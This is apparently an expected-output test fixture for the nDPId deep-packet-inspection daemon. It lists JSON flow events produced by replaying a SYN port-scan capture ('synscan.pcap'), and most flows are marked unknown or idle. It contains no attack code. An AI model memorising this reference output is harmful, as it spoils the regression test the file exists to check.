+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 